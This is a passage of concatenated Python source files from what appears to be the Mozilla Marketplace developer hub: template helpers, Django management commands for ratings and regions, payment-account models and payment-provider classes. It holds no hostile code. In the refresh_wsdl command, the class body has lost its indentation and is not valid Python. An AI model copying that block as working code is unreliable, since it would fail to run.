    crumbs = [(reverse('ecosystem.landing'), _('Developers'))]
    title = _('My Submissions')
    link = reverse('mkt.developers.apps')
    # BUGFIX: this conditional used to be nested under `if addon:`, which
    # made the `not addon and not items` branch unreachable and skipped the
    # 'My Submissions' crumb entirely for items-only calls.
    if not addon and not items:
        # We are at the end of the crumb trail.
        crumbs.append((None, title))
    else:
        crumbs.append((link, title))
    if addon:
        if items:
            url = addon.get_dev_url()
        else:
            # The Addon is the end of the trail.
            url = None
        crumbs.append((url, addon.name))
    if items:
        crumbs.extend(items)
    if len(crumbs) == 1:
        crumbs = []
    return mkt_breadcrumbs(context, items=crumbs)
@register.inclusion_tag('developers/versions/add_file_modal.html')
@jinja2.contextfunction
def add_file_modal(context, title, action, upload_url, action_label):
    """Render the add-file modal dialog."""
    return new_context(context=context, modal_type='file', title=title,
                       action=action, upload_url=upload_url,
                       action_label=action_label)
@register.inclusion_tag('developers/versions/add_file_modal.html')
@jinja2.contextfunction
def add_version_modal(context, title, action, upload_url, action_label):
    """Render the add-version modal dialog (same template, version mode)."""
    return new_context(context=context, modal_type='version', title=title,
                       action=action, upload_url=upload_url,
                       action_label=action_label)
@register.function
def status_choices(addon):
    """Return a dict like STATUS_CHOICES customized for the addon status."""
    choices = dict(amo.MKT_STATUS_CHOICES)
    full_review_track = (amo.STATUS_NOMINATED, amo.STATUS_LITE_AND_NOMINATED,
                         amo.STATUS_PUBLIC)
    # Show "awaiting full review" for unreviewed files on that track.
    if addon.status in full_review_track:
        choices[amo.STATUS_UNREVIEWED] = choices[amo.STATUS_NOMINATED]
    return choices
@register.inclusion_tag('developers/versions/file_status_message.html')
def file_status_message(file, addon, file_history=False):
    """Template context for the status message of a single file."""
    choices = status_choices(addon)
    ctx = {'fileid': file.id,
           'platform': file.amo_platform.name,
           'created': jingo_datetime(file.created),
           'status': choices[file.status],
           'file_history': file_history,
           'actions': amo.LOG_REVIEW_EMAIL_USER,
           'status_date': jingo_datetime(file.datestatuschanged)}
    return ctx
@register.function
def dev_files_status(files, addon):
    """Group files by their status (and files per status)."""
    choices = status_choices(addon)
    counts = defaultdict(int)
    for f in files:
        counts[f.status] += 1
    return [(n, unicode(choices[status])) for status, n in counts.items()]
@register.function
def mkt_status_class(addon):
    """CSS class name reflecting the addon's status."""
    if addon.disabled_by_user and addon.status != amo.STATUS_DISABLED:
        return 'status-disabled'
    return 'status-' + amo.STATUS_CHOICES_API.get(addon.status, 'none')
@register.function
def mkt_file_status_class(addon, version):
    """CSS class name reflecting the status of a version's first file."""
    if addon.disabled_by_user and addon.status != amo.STATUS_DISABLED:
        return 'status-disabled'
    first_file = version.all_files[0]
    return 'status-' + amo.STATUS_CHOICES_API.get(first_file.status, 'none')
@register.function
def log_action_class(action_id):
    """CSS class for a log action id, or None when unknown or unclassed."""
    if action_id not in amo.LOG_BY_ID:
        return None
    cls = amo.LOG_BY_ID[action_id].action_class
    return 'action-' + cls if cls is not None else None
@register.function
def summarize_validation(validation):
    """Readable summary of add-on validation results."""
    # L10n: first parameter is the number of errors
    errors = ngettext('{0} error', '{0} errors',
                      validation.errors).format(validation.errors)
    # L10n: first parameter is the number of warnings
    warnings = ngettext('{0} warning', '{0} warnings',
                        validation.warnings).format(validation.warnings)
    return '{0}, {1}'.format(errors, warnings)
@register.filter
def display_url(url):
    """Display a URL like the browser URL bar would.
    Note: returns a Unicode object, not a valid URL.
    """
    if isinstance(url, unicode):
        # Byte sequences will be url encoded so convert
        # to bytes here just to stop auto decoding.
        url = url.encode('utf8')
    # Renamed from `bytes`: don't shadow the builtin of the same name.
    raw = urllib.unquote(url)
    # Guess the encoding of the unquoted bytes before decoding for display.
    guessed = chardet.detect(raw)
    return raw.decode(guessed['encoding'], 'replace')
@register.function
def dev_agreement_ok(user):
    """Return False when the user must re-accept the developer agreement."""
    latest = settings.DEV_AGREEMENT_LAST_UPDATED
    if not latest:
        # Value not set for last updated.
        return True
    if user.is_anonymous():
        return True
    current = user.read_dev_agreement
    if not current:
        # If you don't have any apps, we won't worry about this because
        # you'll be prompted on the first submission.
        return True
    # False when the dev agreement was updated after the user last read it.
    return current.date() >= latest
@register.function
def passed_iarc_app_disable_date():
    """True once the IARC app-disable deadline has passed."""
    return settings.IARC_APP_DISABLE_DATE < datetime.datetime.now()
########NEW FILE########
__FILENAME__ = cleanup_addon_premium
from django.core.management.base import BaseCommand
import amo
from addons.models import AddonPremium
class Command(BaseCommand):
    help = 'Clean up existing AddonPremium objects for free apps.'

    def handle(self, *args, **options):
        # Free apps should never carry an AddonPremium row.
        stale = AddonPremium.objects.filter(
            addon__premium_type__in=amo.ADDON_FREES)
        stale.delete()
########NEW FILE########
__FILENAME__ = exclude_games
import logging
from django.core.management.base import BaseCommand
import amo
import mkt
log = logging.getLogger('z.task')
class Command(BaseCommand):
    help = ('Exclude pre-IARC unrated public games in Brazil/Germany.')
    def handle(self, *args, **options):
        """Flag public games lacking USK/CLASSIND ratings as IARC-excluded."""
        # Avoid import error.
        from mkt.webapps.models import Geodata, Webapp
        # Public (or awaiting-public) apps in the 'games' category.
        games = Webapp.objects.filter(
            category__type=amo.ADDON_WEBAPP, category__slug='games',
            status__in=(amo.STATUS_PUBLIC, amo.STATUS_PUBLIC_WAITING))
        for app in games:
            save = False
            geodata, c = Geodata.objects.safer_get_or_create(addon=app)
            # Germany.
            if (not app.content_ratings.filter(
                ratings_body=mkt.ratingsbodies.USK.id).exists()):
                save = True
                geodata.region_de_iarc_exclude = True
                log.info('[App %s - %s] Excluded in region de'
                         % (app.pk, app.slug))
            # Brazil.
            if (not app.content_ratings.filter(
                ratings_body=mkt.ratingsbodies.CLASSIND.id).exists()):
                save = True
                geodata.region_br_iarc_exclude = True
                log.info('[App %s - %s] Excluded in region br'
                         % (app.pk, app.slug))
            # Only hit the database when something actually changed.
            if save:
                geodata.save()
########NEW FILE########
__FILENAME__ = exclude_region
import logging
from django.core.management.base import BaseCommand, CommandError
log = logging.getLogger('z.task')
class Command(BaseCommand):
    help = ('Exclude apps in a given region. Syntax: \n'
            '    ./manage.py exclude_region <region_slug>')

    def handle(self, *args, **options):
        # Avoid import error.
        from mkt.regions.utils import parse_region
        from mkt.webapps.models import Webapp
        # A region slug is required on the command line.
        if not args:
            raise CommandError(self.help)
        region = parse_region(args[0])
        for app in Webapp.objects.all():
            aer, created = app.addonexcludedregion.get_or_create(
                region=region.id)
            if created:
                log.info('[App %s - %s] Excluded in region %r'
                         % (app.pk, app.slug, region.slug))
########NEW FILE########
__FILENAME__ = migrate_geodata
import logging
from django.core.management.base import BaseCommand
import amo
from mkt.constants.regions import (REGIONS_CHOICES_ID_DICT,
SPECIAL_REGION_IDS)
log = logging.getLogger('z.task')
class Command(BaseCommand):
    """
    Backfill Webapp Geodata by inferring regional popularity from
    AddonExcludedRegion objects (or lack thereof).
    Remove AddonExcludedRegion objects for free apps.
    """
    def handle(self, *args, **options):
        from mkt.webapps.models import Webapp
        # Paid premium types plus free-with-in-app count as "paid" here.
        paid_types = amo.ADDON_PREMIUMS + (amo.ADDON_FREE_INAPP,)
        apps = Webapp.objects.all()
        for app in apps:
            # If it's already restricted, don't bother.
            if app.geodata.restricted:
                continue
            geodata = {}
            # If this app was excluded in every region except one,
            # let's consider it regionally popular in that particular region.
            region_ids = app.get_region_ids()
            if len(region_ids) == 1:
                geodata['popular_region'] = (
                    REGIONS_CHOICES_ID_DICT[region_ids[0]].slug
                )
            if app.premium_type in paid_types:
                # Paid apps keep their exclusions, marked as restricted.
                geodata['restricted'] = True
            else:
                # Free apps: drop every exclusion outside the special regions.
                exclusions = app.addonexcludedregion.exclude(
                    region__in=SPECIAL_REGION_IDS)
                for exclusion in exclusions:
                    log.info('[App %s - %s] Removed exclusion: %s'
                             % (app.pk, app.slug, exclusion))
                    # Remove all other existing exclusions, since all apps
                    # are public in every region by default. If developers
                    # want to hard-restrict their apps they can now do that.
                    exclusion.delete()
            app.geodata.update(**geodata)
########NEW FILE########
__FILENAME__ = populate_solitude_public_ids
from optparse import make_option
from django.core.exceptions import ObjectDoesNotExist, MultipleObjectsReturned
from django.core.management.base import BaseCommand
from amo.utils import chunked
from mkt.developers.providers import Provider
from mkt.developers.utils import uri_to_pk
from mkt.webapps.models import Webapp
from mkt.webpay.utils import make_external_id
def get_generic_product(app):
    """Look up the Solitude generic product for *app*.
    Tries each of the app's payment accounts in turn and returns the first
    matching product dict; returns None (implicitly) when none is found.
    """
    if app.app_payment_accounts.exists():
        for account in app.app_payment_accounts.all():
            print (
                'Looking up public_id for app '
                '{app} using account {account}'
            ).format(
                app=app,
                account=account.payment_account.seller_uri)
            try:
                generic_product = Provider.generic.product.get_object(
                    seller=uri_to_pk(account.payment_account.seller_uri),
                    external_id=make_external_id(app))
                print (
                    'Found generic product {product} for '
                    'app {app} using account {account}'
                ).format(
                    product=generic_product['public_id'],
                    app=app,
                    account=account)
                return generic_product
            except ObjectDoesNotExist:
                # No product for this account; try the next one.
                pass
            except MultipleObjectsReturned:
                # Ambiguous data in Solitude: report and keep looking.
                print 'Found multiple generic products for app {app}'.format(
                    app=app)
    print 'Unable to find a generic product for app {app}'.format(app=app)
class Command(BaseCommand):
    help = ('Look up and store the Generic Product public_ids'
            ' for existing webapps with configured payment accounts.')
    option_list = BaseCommand.option_list + (
        make_option(
            '--dry-run',
            default=False,
            action='store_true',
            dest='dry_run',
            help='Look up the public_ids in Solitude without saving'),)
    def handle(self, *args, **options):
        # Only apps that actually have payment accounts configured.
        webapps = (Webapp.objects.filter(app_payment_accounts__isnull=False)
                   .no_transforms()
                   .select_related('app_payment_accounts'))
        # Process in chunks of 50 to bound memory use.
        for chunk in chunked(webapps, 50):
            for app in chunk:
                generic_product = get_generic_product(app)
                if not generic_product:
                    continue
                print 'Found public_id', generic_product['public_id']
                if not options['dry_run']:
                    print 'Saving app', app
                    app.solitude_public_id = generic_product['public_id']
                    app.save()
########NEW FILE########
__FILENAME__ = refresh_iarc_ratings
import logging
from optparse import make_option
from django.core.management.base import BaseCommand
from amo.utils import chunked
from mkt.developers.tasks import refresh_iarc_ratings
log = logging.getLogger('z.task')
class Command(BaseCommand):
    """
    Refresh old or corrupt IARC ratings by re-fetching the certificate.
    """
    option_list = BaseCommand.option_list + (
        make_option('--apps',
                    help='Webapp ids to process. Use commas to separate '
                         'multiple ids.'),
    )
    help = __doc__

    def handle(self, *args, **kw):
        from mkt.webapps.models import Webapp
        # All apps with IARC info, optionally narrowed by --apps.
        apps = Webapp.objects.filter(iarc_info__isnull=False)
        id_csv = kw.get('apps')
        if id_csv:
            wanted = (int(pk.strip()) for pk in id_csv.split(','))
            apps = apps.filter(id__in=wanted)
        # Fan the ids out to the celery task in batches of 100.
        for batch in chunked(apps.values_list('id', flat=True), 100):
            refresh_iarc_ratings.delay(batch)
########NEW FILE########
__FILENAME__ = refresh_wsdl
import os
from django.conf import settings
from django.core.management.base import BaseCommand
import requests
# Destination directory for the fetched WSDL files.
root = os.path.join(settings.ROOT, 'lib', 'iarc', 'wsdl')
# Per-environment lists of (source URL, destination filename) pairs.
sources = {
    'prod': [
        ('https://www.globalratings.com/iarcprodservice/iarcservices.svc?wsdl',
         'iarc_services.wsdl'),
    ],
    'test': [
        ('https://www.globalratings.com/iarcdemoservice/iarcservices.svc?wsdl',
         'iarc_services.wsdl'),
    ]
}
class Command(BaseCommand):
help = 'Refresh the WSDLs.'
def handle(self, *args, **kw):
for dir, paths in sources.items():
for src, filename in paths:
dest = os.path.join(root, dir, filename)
top = os.path.dirname(dest)
if not os.path.exists(top):
os.makedirs(top)
print 'Getting', src
open(dest, 'w').write(requests.get(src).text)
print '...written to', dest
########NEW FILE########
__FILENAME__ = remove_old_aers
import logging
from django.core.management.base import BaseCommand
import amo
from amo.decorators import write
from mkt import regions
log = logging.getLogger('z.task')
class Command(BaseCommand):
    help = ('Remove game-related AERs for Brazil + Germany.')

    @write
    def handle(self, *args, **options):
        # Avoid import error.
        from mkt.webapps.models import Webapp
        games = Webapp.objects.filter(
            category__type=amo.ADDON_WEBAPP, category__slug='games')
        for app in games:
            aers = app.addonexcludedregion
            # Exactly the BR+DE pair, nothing else: safe to drop both.
            only_br_de = (aers.count() == 2 and
                          aers.filter(region=regions.BR.id).exists() and
                          aers.filter(region=regions.DE.id).exists())
            if only_br_de:
                log.info('Removing BR/DE AERs for %s' % app.id)
                aers.all().delete()
########NEW FILE########
__FILENAME__ = requeue_uploads
from django.core.management.base import BaseCommand
class Command(BaseCommand):
    help = "Requeue any stranded add-on uploads after restarting Rabbit."
    def handle(self, *args, **options):
        from files.models import FileUpload
        from mkt.developers import tasks
        # Uploads with neither a task error nor a validation result never
        # finished; re-dispatch the validator task for each of them.
        qs = FileUpload.objects.filter(task_error=None, validation=None)
        pks = qs.values_list('pk', flat=True)
        print 'Restarting %s tasks.' % len(pks)
        for pk in pks:
            tasks.validator.delay(pk)
########NEW FILE########
__FILENAME__ = models
import posixpath
import uuid
from django.conf import settings
from django.core.urlresolvers import reverse
from django.db import models
import commonware.log
from tower import ugettext as _
import amo
from constants.payments import PROVIDER_BANGO, PROVIDER_CHOICES
from lib.crypto import generate_key
from lib.pay_server import client
from mkt.constants.payments import ACCESS_SIMULATE
from users.models import UserForeignKey
log = commonware.log.getLogger('z.devhub')
class CantCancel(Exception):
    """Raised when a payment account cannot be cancelled (e.g. shared)."""
    pass
class SolitudeSeller(amo.models.ModelBase):
    """Local mirror of a user's generic 'seller' object in Solitude."""
    # TODO: When Solitude allows for it, this should be updated to be 1:1 with
    # users.
    user = UserForeignKey()
    # UUID shared with the Solitude seller object.
    uuid = models.CharField(max_length=255, unique=True)
    # URI of the seller resource in Solitude.
    resource_uri = models.CharField(max_length=255)
    class Meta:
        db_table = 'payments_seller'
    @classmethod
    def create(cls, user):
        """Create a seller in Solitude and a mirroring local row for user."""
        uuid_ = str(uuid.uuid4())
        res = client.api.generic.seller.post(data={'uuid': uuid_})
        uri = res['resource_uri']
        obj = cls.objects.create(user=user, uuid=uuid_, resource_uri=uri)
        log.info('[User:%s] Created Solitude seller (uuid:%s)' %
                 (user, uuid_))
        return obj
class PaymentAccount(amo.models.ModelBase):
    """A developer's account with a payment provider (Bango/Boku/etc.)."""
    user = UserForeignKey()
    # Display name chosen by the developer.
    name = models.CharField(max_length=64)
    agreed_tos = models.BooleanField(default=False)
    solitude_seller = models.ForeignKey(SolitudeSeller)
    # These two fields can go away when we're not 1:1 with SolitudeSellers.
    seller_uri = models.CharField(max_length=255, unique=True)
    uri = models.CharField(max_length=255, unique=True)
    # A soft-delete so we can talk to Solitude asynchronously.
    inactive = models.BooleanField(default=False)
    # The id for this account from the provider.
    account_id = models.CharField(max_length=255)
    # Each account will be for a particular provider.
    provider = models.IntegerField(choices=PROVIDER_CHOICES,
                                   default=PROVIDER_BANGO)
    # Shared accounts may be used by apps of other developers.
    shared = models.BooleanField(default=False)
    class Meta:
        db_table = 'payment_accounts'
        unique_together = ('user', 'uri')
    def cancel(self, disable_refs=False):
        """Cancels the payment account.
        If `disable_refs` is set, existing apps that use this payment account
        will be set to STATUS_NULL.
        Raises CantCancel for a shared account that apps still reference.
        """
        account_refs = AddonPaymentAccount.objects.filter(account_uri=self.uri)
        if self.shared and account_refs:
            # With sharing a payment account comes great responsibility. It
            # would be really mean to create a payment account, share it
            # and have lots of apps use it. Then one day you remove it and
            # make a whole pile of apps in the marketplace get removed from
            # the store, or have in-app payments fail.
            #
            # For the moment I'm just stopping this completely, if this ever
            # happens, we'll have to go through a deprecation phase.
            # - let all the apps that use it know
            # - when they have all stopped sharing it
            # - re-run this
            log.error('Cannot cancel a shared payment account that has '
                      'apps using it.')
            raise CantCancel('You cannot cancel a shared payment account.')
        self.update(inactive=True)
        log.info('Soft-deleted payment account (uri: %s)' % self.uri)
        for acc_ref in account_refs:
            if (disable_refs and
                not acc_ref.addon.has_multiple_payment_accounts()):
                # NOTE(review): missing space between '{0}' and 'because'
                # in this log message — renders as e.g. '5because of ...'.
                log.info('Changing app status to NULL for app: {0}'
                         'because of payment account deletion'.format(
                             acc_ref.addon_id))
                acc_ref.addon.update(status=amo.STATUS_NULL)
            log.info('Deleting AddonPaymentAccount for app: {0} because of '
                     'payment account deletion'.format(acc_ref.addon_id))
            acc_ref.delete()
    def get_provider(self):
        """Returns an instance of the payment provider for this account."""
        # TODO: fix circular import. Providers imports models which imports
        # forms which imports models.
        from mkt.developers.providers import get_provider
        return get_provider(id=self.provider)
    def __unicode__(self):
        date = self.created.strftime('%m/%y')
        if not self.shared:
            return u'%s - %s' % (date, self.name)
        # L10n: {0} is the name of the account.
        return _(u'Shared Account: {0}'.format(self.name))
    def get_agreement_url(self):
        # URL of the provider terms-of-service agreement page.
        return reverse('mkt.developers.provider.agreement', args=[self.pk])
class AddonPaymentAccount(amo.models.ModelBase):
    """Joins an app (Addon) to the PaymentAccount it bills through."""
    addon = models.ForeignKey(
        'addons.Addon', related_name='app_payment_accounts')
    payment_account = models.ForeignKey(PaymentAccount)
    # Solitude URIs for the account and the provider-specific product.
    account_uri = models.CharField(max_length=255)
    product_uri = models.CharField(max_length=255, unique=True)
    class Meta:
        db_table = 'addon_payment_account'
    @property
    def user(self):
        # Convenience accessor: owner of the underlying payment account.
        return self.payment_account.user
class UserInappKey(amo.models.ModelBase):
    """A developer's in-app payments dev key, backed by a Solitude product."""
    solitude_seller = models.ForeignKey(SolitudeSeller)
    # pk of the backing Solitude generic product.
    seller_product_pk = models.IntegerField(unique=True)
    def secret(self):
        # Fetched live from Solitude; never stored locally.
        return self._product().get()['secret']
    def public_id(self):
        return self._product().get()['public_id']
    def reset(self):
        # Rotate the key by writing a fresh 48-byte secret to Solitude.
        self._product().patch(data={'secret': generate_key(48)})
    @classmethod
    def create(cls, user):
        """Create the Solitude seller + simulate-only product for user."""
        sel = SolitudeSeller.create(user)
        # Create a product key that can only be used for simulated purchases.
        prod = client.api.generic.product.post(data={
            'seller': sel.resource_uri, 'secret': generate_key(48),
            'external_id': str(uuid.uuid4()), 'public_id': str(uuid.uuid4()),
            'access': ACCESS_SIMULATE,
        })
        log.info(u'User %s created an in-app payments dev key product=%s '
                 u'with %s' % (unicode(user), prod['resource_pk'], sel))
        return cls.objects.create(solitude_seller=sel,
                                  seller_product_pk=prod['resource_pk'])
    def _product(self):
        # Handle on the Solitude generic product resource for this key.
        return client.api.generic.product(self.seller_product_pk)
    class Meta:
        db_table = 'user_inapp_keys'
class PreloadTestPlan(amo.models.ModelBase):
    """A test-plan document uploaded for an app's preload submission."""
    addon = models.ForeignKey('addons.Addon')
    last_submission = models.DateTimeField(auto_now_add=True)
    filename = models.CharField(max_length=60)
    status = models.PositiveSmallIntegerField(default=amo.STATUS_PUBLIC)
    class Meta:
        db_table = 'preload_test_plans'
        ordering = ['-last_submission']
    @property
    def preload_test_plan_url(self):
        # Disabled apps are served from the private mirror host.
        host = (settings.PRIVATE_MIRROR_URL if self.addon.is_disabled
                else settings.LOCAL_MIRROR_URL)
        return posixpath.join(host, str(self.addon.id), self.filename)
########NEW FILE########
__FILENAME__ = providers
import os
import uuid
from datetime import datetime
from django.conf import settings
from django.core.exceptions import ImproperlyConfigured, ObjectDoesNotExist
from django.core.urlresolvers import reverse
import bleach
import commonware
from curling.lib import HttpClientError
from tower import ugettext_lazy as _
from constants.payments import (PROVIDER_BANGO, PROVIDER_BOKU,
PROVIDER_REFERENCE)
from lib.crypto import generate_key
# Because client is used in the classes, renaming here for clarity.
from lib.pay_server import client as pay_client
from mkt.constants.payments import ACCESS_PURCHASE
from mkt.developers import forms_payments
from mkt.developers.models import PaymentAccount, SolitudeSeller
from mkt.developers.utils import uri_to_pk
from mkt.webpay.utils import make_external_id
root = 'developers/payments/includes/'
log = commonware.log.getLogger('z.devhub.providers')
def account_check(f):
    """
    Use this decorator on Provider methods to ensure that the account
    being passed into the method belongs to that provider.

    Raises ValueError when any positional PaymentAccount argument has a
    different provider than the Provider instance the method is bound to.
    """
    # Local import keeps the module-level import block untouched.
    import functools

    # BUGFIX: preserve the wrapped function's name/docstring so logging,
    # debugging, and introspection see the real method, not 'wrapper'.
    @functools.wraps(f)
    def wrapper(self, *args, **kwargs):
        for arg in args:
            if (isinstance(arg, PaymentAccount)
                and arg.provider != self.provider):
                raise ValueError('Wrong account {0} != {1}'
                                 .format(arg.provider, self.provider))
        return f(self, *args, **kwargs)
    return wrapper
class Provider(object):
    """Base class for payment-provider integrations (Bango, Boku, ...).
    Subclasses fill in the provider-specific CRUD methods below; the
    generic Solitude product/seller handling lives here.
    """
    # Handle on Solitude's generic (provider-agnostic) API.
    generic = pay_client.api.generic
    def account_create(self, user, form_data):
        # Subclasses create the provider account and return a PaymentAccount.
        raise NotImplementedError
    @account_check
    def account_retrieve(self, account):
        raise NotImplementedError
    @account_check
    def account_update(self, account, form_data):
        raise NotImplementedError
    # NOTE(review): decorated with @account_check but takes an app, not an
    # account — the check is a no-op here; confirm whether intentional.
    @account_check
    def get_or_create_public_id(self, app):
        """
        Returns the Solitude public_id for this app if set
        otherwise creates one
        """
        if app.solitude_public_id is None:
            app.solitude_public_id = str(uuid.uuid4())
            app.save()
        return app.solitude_public_id
    @account_check
    def get_or_create_generic_product(self, app, secret=None):
        """Fetch the app's generic Solitude product, creating it (and a
        fresh seller) on first use."""
        product_data = {
            'public_id': self.get_or_create_public_id(app),
        }
        try:
            generic = self.generic.product.get_object_or_404(**product_data)
        except ObjectDoesNotExist:
            seller_uuid = str(uuid.uuid4())
            seller = self.generic.seller.post(data={'uuid': seller_uuid})
            log.info(
                'Creating a new Generic Solitude '
                'Seller {seller_uuid} for app {app}'.format(
                    seller_uuid=seller_uuid,
                    app=app,
                )
            )
            product_data.update({
                'external_id': make_external_id(app),
                'seller': seller['resource_uri'],
                'secret': secret or generate_key(48),
                'access': ACCESS_PURCHASE,
            })
            generic = self.generic.product.post(data=product_data)
            log.info(
                'Creating a new Generic Solitude Product '
                '{public_id} for app {app}'.format(
                    public_id=product_data['public_id'],
                    app=app,
                )
            )
        return generic
    @account_check
    def product_create(self, account, app, secret):
        raise NotImplementedError
    def setup_seller(self, user):
        # Create (Solitude + local) seller objects for this user.
        log.info('[User:{0}] Creating seller'.format(user.pk))
        return SolitudeSeller.create(user)
    def setup_account(self, **kw):
        # Persist a PaymentAccount row; kw must include user, uri and
        # solitude_seller (seller_uri/provider are derived here).
        log.info('[User:{0}] Created payment account (uri: {1})'
                 .format(kw['user'].pk, kw['uri']))
        kw.update({'seller_uri': kw['solitude_seller'].resource_uri,
                   'provider': self.provider})
        return PaymentAccount.objects.create(**kw)
    @account_check
    def terms_create(self, account):
        raise NotImplementedError
    @account_check
    def terms_retrieve(self, account):
        raise NotImplementedError
    def get_portal_url(self, app_slug=None):
        """
        Return a URL to the payment provider's portal.
        The URL can be an empty string if the provider
        doesn't have a portal.
        """
        return ''
class Bango(Provider):
    """
    The special Bango implementation.
    """
    # Form-data keys forwarded to the Solitude bank-details endpoint.
    bank_values = (
        'seller_bango', 'bankAccountPayeeName', 'bankAccountNumber',
        'bankAccountCode', 'bankName', 'bankAddress1', 'bankAddress2',
        'bankAddressZipCode', 'bankAddressIso'
    )
    client = pay_client.api.bango
    # This is at the new provider API.
    client_provider = pay_client.api.provider.bango
    forms = {
        'account': forms_payments.BangoPaymentAccountForm,
    }
    full = 'Bango'
    name = 'bango'
    # Form-data keys forwarded to the Solitude package endpoint.
    package_values = (
        'adminEmailAddress', 'supportEmailAddress', 'financeEmailAddress',
        'paypalEmailAddress', 'vendorName', 'companyName', 'address1',
        'address2', 'addressCity', 'addressState', 'addressZipCode',
        'addressPhone', 'countryIso', 'currencyIso', 'vatNumber'
    )
    provider = PROVIDER_BANGO
    templates = {
        'add': os.path.join(root, 'add_payment_account_bango.html'),
        'edit': os.path.join(root, 'edit_payment_account_bango.html'),
    }
    def account_create(self, user, form_data):
        """Create the Bango package + bank details and a PaymentAccount."""
        # Get the seller object.
        user_seller = self.setup_seller(user)
        # Get the data together for the package creation.
        package_values = dict((k, v) for k, v in form_data.items() if
                              k in self.package_values)
        # Dummy value since we don't really use this.
        package_values.setdefault('paypalEmailAddress', '[email protected]')
        package_values['seller'] = user_seller.resource_uri
        log.info('[User:%s] Creating Bango package' % user)
        res = self.client.package.post(data=package_values)
        uri = res['resource_uri']
        # Get the data together for the bank details creation.
        bank_details_values = dict((k, v) for k, v in form_data.items() if
                                   k in self.bank_values)
        bank_details_values['seller_bango'] = uri
        log.info('[User:%s] Creating Bango bank details' % user)
        self.client.bank.post(data=bank_details_values)
        return self.setup_account(user=user,
                                  uri=res['resource_uri'],
                                  solitude_seller=user_seller,
                                  account_id=res['package_id'],
                                  name=form_data['account_name'])
    @account_check
    def account_retrieve(self, account):
        # Merge the local account name with the full Bango package data.
        data = {'account_name': account.name}
        package_data = (self.client.package(uri_to_pk(account.uri))
                        .get(data={'full': True}))
        data.update((k, v) for k, v in package_data.get('full').items() if
                    k in self.package_values)
        return data
    @account_check
    def account_update(self, account, form_data):
        # Rename locally, then patch the remaining fields onto the package.
        account.update(name=form_data.pop('account_name'))
        self.client.api.by_url(account.uri).patch(
            data=dict((k, v) for k, v in form_data.items() if
                      k in self.package_values))
    @account_check
    def product_create(self, account, app):
        secret = generate_key(48)
        generic = self.get_or_create_generic_product(app, secret=secret)
        product_uri = generic['resource_uri']
        data = {'seller_product': uri_to_pk(product_uri)}
        # There are specific models in solitude for Bango details.
        # These are SellerBango and SellerProductBango that store Bango
        # details such as the Bango Number.
        #
        # Solitude calls Bango to set up whatever it needs.
        try:
            res = self.client.product.get_object_or_404(**data)
        except ObjectDoesNotExist:
            # The product does not exist in Solitude so create it.
            res = self.client_provider.product.post(data={
                'seller_bango': account.uri,
                'seller_product': product_uri,
                'name': unicode(app.name),
                'packageId': account.account_id,
                'categoryId': 1,
                'secret': secret
            })
        return res['resource_uri']
    @account_check
    def terms_update(self, account):
        # Mark ToS accepted locally and kick off Bango's SBI flow.
        package = self.client.package(account.uri).get_object_or_404()
        account.update(agreed_tos=True)
        return self.client.sbi.post(data={
            'seller_bango': package['resource_uri']})
    @account_check
    def terms_retrieve(self, account):
        # Fetch the agreement text; sanitize the HTML before display.
        package = self.client.package(account.uri).get_object_or_404()
        res = self.client.sbi.agreement.get_object(data={
            'seller_bango': package['resource_uri']})
        if 'text' in res:
            res['text'] = bleach.clean(res['text'], tags=['h3', 'h4', 'br',
                                                          'p', 'hr'])
        return res
    def get_portal_url(self, app_slug=None):
        url = 'mkt.developers.apps.payments.bango_portal_from_addon'
        return reverse(url, args=[app_slug]) if app_slug else ''
class Reference(Provider):
    """
    The reference implementation provider. If another provider
    implements to the reference specification, then it should be able to
    just inherit from this with minor changes.
    """
    client = pay_client.api.provider.reference
    forms = {
        'account': forms_payments.ReferenceAccountForm,
    }
    full = _('Reference Implementation')
    name = 'reference'
    provider = PROVIDER_REFERENCE
    templates = {
        'add': os.path.join(root, 'add_payment_account_reference.html'),
        'edit': os.path.join(root, 'edit_payment_account_reference.html'),
    }
    def account_create(self, user, form_data):
        """Create a seller on the reference provider and a PaymentAccount."""
        user_seller = self.setup_seller(user)
        form_data.update({'uuid': user_seller.uuid, 'status': 'ACTIVE'})
        name = form_data.pop('account_name')
        res = self.client.sellers.post(data=form_data)
        return self.setup_account(user=user,
                                  uri=res['resource_uri'],
                                  solitude_seller=user_seller,
                                  account_id=res['id'],
                                  name=name)
    @account_check
    def account_retrieve(self, account):
        # Local name merged with the provider's seller record.
        data = {'account_name': account.name}
        data.update(self.client.sellers(account.account_id).get())
        return data
    @account_check
    def account_update(self, account, form_data):
        account.update(name=form_data.pop('account_name'))
        self.client.sellers(account.account_id).put(form_data)
    @account_check
    def product_create(self, account, app):
        secret = generate_key(48)
        generic = self.get_or_create_generic_product(app, secret=secret)
        # These just pass straight through to zippy to create the product
        # and don't create any intermediate objects in solitude.
        #
        # Until bug 948240 is fixed, we have to do this, again.
        try:
            created = self.client.products.get(
                external_id=generic['external_id'],
                seller_id=uri_to_pk(account.uri))
        except HttpClientError:
            created = []
        if len(created) > 1:
            raise ValueError('Zippy returned more than one resource.')
        elif len(created) == 1:
            # Product already exists; reuse it.
            return created[0]['resource_uri']
        created = self.client.products.post(data={
            'external_id': generic['external_id'],
            'seller_id': uri_to_pk(account.uri),
            'name': unicode(app.name),
            'uuid': str(uuid.uuid4()),
        })
        return created['resource_uri']
    @account_check
    def terms_retrieve(self, account):
        # Sanitize the agreement HTML before display.
        res = self.client.terms(account.account_id).get()
        if 'text' in res:
            res['text'] = bleach.clean(res['text'])
        return res
    @account_check
    def terms_update(self, account):
        account.update(agreed_tos=True)
        # GETed data from Zippy needs to be reformated prior to be PUT
        # until bug 966096 is fixed.
        data = self.client.sellers(account.account_id).get()
        for field in ['id', 'resource_uri', 'resource_name']:
            del data[field]
        data['agreement'] = datetime.now().strftime('%Y-%m-%d')
        return self.client.sellers(account.account_id).put(data)
class Boku(Provider):
    """
    Specific Boku implementation details.
    """
    client = pay_client.api.boku
    forms = {
        'account': forms_payments.BokuAccountForm,
    }
    full = _('Boku')
    name = 'boku'
    provider = PROVIDER_BOKU
    templates = {
        'add': os.path.join(root, 'add_payment_account_boku.html'),
        'edit': os.path.join(root, 'edit_payment_account_boku.html'),
    }
    signup_url = settings.BOKU_SIGNUP_URL
    def account_create(self, user, form_data):
        """Create a Boku seller and a PaymentAccount (ToS pre-accepted)."""
        user_seller = self.setup_seller(user)
        form_data.update({'seller': user_seller.resource_uri})
        name = form_data.pop('account_name')
        res = self.client.seller.post(data=form_data)
        return self.setup_account(account_id=res['id'],
                                  agreed_tos=True,
                                  name=name,
                                  solitude_seller=user_seller,
                                  user=user,
                                  uri=res['resource_uri'])
    @account_check
